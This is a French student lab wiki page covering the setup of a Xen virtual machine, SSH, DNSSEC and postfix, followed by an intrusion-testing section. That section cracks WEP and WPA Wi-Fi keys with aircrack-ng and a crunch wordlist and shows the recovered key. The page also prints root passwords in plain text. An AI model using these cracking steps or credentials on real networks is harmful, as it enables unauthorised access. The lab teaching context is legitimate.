TP sysres IMA2a5 2020/2021 G1 : Différence entre versions

De Wiki d'activités IMA
(Configuration DNS)
Ligne 206 : Ligne 206 :
  
 
   file "/etc/bind/liosaw.site.signed";
 
   file "/etc/bind/liosaw.site.signed";
 +
 +
===Certificat SSL===
 +
 +
Installation de ''postfix'':
 +
 +
apt install postfix
 +
 +
On choisit les options ''site internet'' puis on entre notre nom de domaine: ''liosaw.site''
 +
 +
On modifie le fichier ''/etc/aliases'':
 +
 +
admin : root
 +
 +
 +
  
 
== '''Tests d'intrusion''' ==
 
== '''Tests d'intrusion''' ==

Version du 13 novembre 2020 à 08:17

Login: root & password: glopglopglop

Introduction

Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système, nous avons eu à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé nous ont permis de mettre en pratique nos connaissances en la matière.


Partie Hardware

Nécessité de changer le rack. Nous avons eu la chance d'avoir à notre disposition du matériel récent que la classe s'est empressée d'installer. Les cartes et alimentations enfichées dans le rack initialement contenu dans la baie ont été retirées une à une afin de l'alléger. Ensuite le rack (non E) a été retiré. Puis le nouveau rack (E) a été mis dans la baie. Les points de fixations ont du être adaptés. Suivi par "l’en-fichage" des alimentations ainsi que des nouvelles cartes, correspondant au nouveau rack.


Serveur & Disques

Lors de la première séance de TP, nous avons voulu rajouter des nouveaux disques sur le serveur capbreton. Pour cela, nous avons extrait un disque d'un autre serveur, ainsi qu'un disque présent sur le serveur capbreton afin de les comparer: berceau identique, taille du disque, emplacement de la connectique.


Machine virtuelle: Installation et Configuration

Connexion au serveur

Dans le cadre de notre TP, nous avons du créer nos machines virtuelles sur le serveur capbreton:

ssh capbreton.plil.info

Création de la Machine Virtuelle

Grace à la commande ci-dessous, on définit:

  • Le nom de la machine: rafale
  • Son adresse IP: 193.48.57.164
xen-create-image --hostname rafale --ip 193.48.57.164 --gateway 193.48.57.163 --dir /usr/local/xen --dist beowulf

Dans un autre terminal, on peut utiliser la commande suivante afin d'afficher l'avancement de l'installation de la machine:

tail -f /var/log/xen-tools/rafale.cfg

Configuration de la Machine Virtuelle

vim /etc/xen/rafale.cfg

Dans le fichier obtenu, dans la catégorie Networking, il a fallu rajouter le bridge de notre groupe, à savoir IMA2a5.

#
# Configuration file for the Xen instance rafale, created
# by xen-tools 4.8 on Fri Sep  25 10:23:30 2020.
#

#
#  Kernel + memory size
#
kernel      = '/boot/vmlinuz-4.19.0-9-amd64'
extra       = 'elevator=noop'
ramdisk     = '/boot/initrd.img-4.19.0-9-amd64'

vcpus       = '1'
memory      = '256'


#
#  Disk device(s).
#
root        = '/dev/xvda2 ro'
disk        = [
'file:/usr/local/xen/domains/rafale/disk.img,xvda2,w',
'file:/usr/local/xen/domains/rafale/swap.img,xvda1,w',
]


#
#  Physical volumes
#


#
#  Hostname
#
name        = 'rafale'

#
#  Networking
#
dhcp        = 'dhcp'
vif         = [ 'mac=00:16:3E:92:0E:6D, bridge=IMA2a5' ]

#
#  Behaviour
#
on_poweroff = 'destroy'
on_reboot   = 'restart'
on_crash    = 'restart'

Home & Var

Sur capbreton:

lvcreate -L10G -n rafale-home virtual
lvcreate -L10G -n rafale-var virtual
mke2fs /dev/virtual/rafale-home
mke2fs /dev/virtual/rafale-var

Puis dans le fichier /etc/xen/rafale.cfg:

disk    	= [
                	'file:/usr/local/xen/domains/rafale/disk.img,xvda2,w',
                	'file:/usr/local/xen/domains/rafale/swap.img,xvda1,w',               
                     'phy:/dev/virtual/rafale-home,xvdb1,w',
                     'phy:/dev/virtual/rafale-var,xvdb2,w',
                 ]

Afin que Home et Var soient pris en compte par la VM, je me connecte sur cette dernière et modifie le fichier /etc/fstab:

vim /etc/fstab
# /etc/fstab: static file system information.
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
proc            /proc           proc    defaults        0       0
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1		/home		ext4		defaults				0		2
/dev/xvdb2		/var		ext4		defaults				0		2                   

On sort du fichier et on va s'occuper du montage de /var, en passant par un dossier provisoire (/mnt):

mount /dev/xvdb2 /mnt
mv /var/* /mnt
umount /mnt
mount -a

On peut taper lsblk ou bien db afin de vérifier la bonne utilisation des volumes.

Démarrage de la Machine Virtuelle

xen create /etc/xen/rafale.cfg
xen console rafale

Le terminal demande ensuite un login et un mot de passe. Le login par défaut est root et le mot de passe est compliqué. Il apparaît tout en bas de la commande tail tapée dans un deuxième terminal, ou on peut le récupérer grâce à la commande (dans un terminal connecté sur capbreton):

cat /var/log/xen-tools/rafale.log | grep Password
Root Password   :  jSWVeqxbg58uvrkfByMxvjJ

Cette dernière commande permet de tout simplement afficher la ligne contenant le mot de passe contenue dans le fichier log. On modifie ensuite ce mot de passe en tapant (sur la VM):

passwd

Le mot de passe est maintenant glopglopglop.

Configuration SSH

Toujours en étant connecté sur la VM, on installe le package openssh-server:

apt install openssh-server

On modifie le fichier de configuration du DNS:

vim /etc/ssh/sshd_config

Puis après avoir modifier ce fichier, on redémarre le SSH:

service ssh restart
[ ok ] Restarting OpenBSD Secure Shell server: sshd.

On peut vérifier que le SSH soit bien en route:

service ssh status
[ ok ] sshd is running.

Configuration DNS

On rajoute une option dans le fichier /etc/bind/named.conf.options:

dnssec-enable yes;

On se place dans le dossier /etc/bind et on crée un nouveau répertoire afin d'y stocker les clés:

cd /etc/bind
mkdir liosaw.site.dnssec
cd liosaw.site.dnssec

On génère ensuite les clés:

dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE liosaw.site
dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE liosaw.site

Puis on les renomme grâce à mv:

liosaw.site-ksk.key
liosaw.site-ksk.private
liosaw.site-zsk.key
liosaw.site-zsk.private

On apporte quelques modifications à /etc/bind/liosaw.site:

$include /etc/bind/liosaw.dnssec/liosaw.site-ksk.key
$include /etc/bind/liosaw.site.dnssec/liosaw.site-zsk.key

Et on effectue la signature des enregistrements de la zone:

dnssec-signzone -o liosaw.site -k /etc/bind/liosaw.site.dnssec/liosaw.site-ksk liosaw.site /etc/bind/liosaw.site.dnssec/liosaw.site-zsk

Un fichier liosaw.site.signed a bel et bien été créé dans /etc/bind.

On modifie maintenant le fichier /etc/bind/named.conf.local:

 file "/etc/bind/liosaw.site.signed";

Certificat SSL

Installation de postfix:

apt install postfix

On choisit les options site internet puis on entre notre nom de domaine: liosaw.site

On modifie le fichier /etc/aliases:

admin : root



Tests d'intrusion

Cassage WEP

apt-get install aircrack-ng
airmon-ng

PHY	Interface	Driver		Chipset
phy3	wlx40a5ef0590b2	rt2800usb	Ralink Technology, Corp. RT5370
airmon-ng start wlx40a5ef0590b2

PHY	Interface	Driver		Chipset
phy3	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370
airodump-ng --encrypt wep -c 2 wlan0mon
ip link set wlan0mon up
dmseg
apt install firmware-linux-nonfree
airodump-ng --encrypt wep wlan0mon
airodump-ng --encrypt wep -c 9 wlan0mon

04:DA:D2:9C:50:50

airodump-ng -c 9 --bssid 04:DA:D2:9C:50:50 wlan0mon
airodump-ng -c 9 --bssid 04:DA:D2:9C:50:50 -w data.txt wlan0mon

Dans un autre terminal:

aircrack-ng -b 04:DA:D2:9C:50:50 data*.cap

Cassage WPA

On procède de la même manière que pour le cassage WEP:

airmon-ng

PHY	Interface	Driver		Chipset
phy3	wlx40a5ef0590b2	rt2800usb	Ralink Technology, Corp. RT5370
airmon-ng start wlx40a5ef0590b2

PHY	Interface	Driver		Chipset
phy3	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370


airodump-ng --encrypt wpa wlan0mon
airodum-ng --encrypt -c 4 wpa wlan0mon

00:14:1B:60:8C:20

On crée un dictionnaire de mots de passe grâce à crunch:

crunch 8 8 0123456789 >> dico_mdp.txt

Dans un autre terminal:

aircrack-ng data*.cap -w dico_mdp.txt
Aircrack-ng 1.5.2 
[00:39:37] 10189509/102795810 keys tested (5109.71 k/s) 
Time left: 5 hours, 2 minutes, 6 seconds                   9.91%
                     KEY FOUND! [ 10222222 ]
Master Key     : 30 D0 05 C7 07 62 21 5B 2F EA DA 24 D2 69 2B 2E 
                 0A 3A E3 92 13 1A C2 11 4A 94 09 B9 23 8E D1 D5 
Transient Key  : 5C CA 88 B1 E8 C7 71 88 1F 32 36 28 66 90 F4 88 
                 A1 DD 58 C6 E7 09 2C 8D 8D CA A6 F4 D8 A0 6A A9 
                 D6 AF 1C 18 93 B4 6A 51 8B 8F 3E 97 96 7C 1C 61 
                 0E 15 78 82 D1 91 BB 5C 84 F5 A4 9D E5 D2 C9 E5 
EAPOL HMAC     : A7 CA 2F 8E 12 05 BF 54 43 02 D0 75 00 2F 72 63